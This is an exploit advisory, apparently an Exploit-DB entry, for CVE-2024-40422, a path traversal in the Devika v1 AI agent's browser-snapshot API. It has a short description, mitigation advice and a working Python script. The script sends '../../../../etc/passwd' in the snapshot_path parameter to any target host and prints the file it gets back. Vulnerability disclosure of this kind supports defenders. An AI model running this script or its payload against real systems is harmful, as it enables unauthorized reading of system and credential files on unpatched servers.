Devika v1 - Path Traversal via 'snapshot_path' Parameter

vendor:

Devika

by:

Alperen Ergel

8.1

CVSS

CRITICAL

Path Traversal

CWE

Product Name: Devika

Affected Version From: v1

Affected Version To: v1

Patch Exists: NO

Related CWE: CVE-2024-40422

CPE: a:devikaai:devika:v1

Metasploit:

Other Scripts:

Platforms Tested: Windows 11 Home Edition

2024

Devika v1 – Path Traversal via ‘snapshot_path’ Parameter

The Devika v1 application is vulnerable to a path traversal exploit via the 'snapshot_path' parameter. By manipulating the parameter, an attacker can traverse directories and access sensitive files such as /etc/passwd. This vulnerability has been assigned the CVE ID CVE-2024-40422.

Mitigation:

To mitigate this vulnerability, input validation on the 'snapshot_path' parameter should be implemented to restrict access to specific directories. Additionally, access controls should be enforced to prevent unauthorized access to sensitive files.

Source

Exploit-DB raw data:

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }

    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()

    exploit(args.target)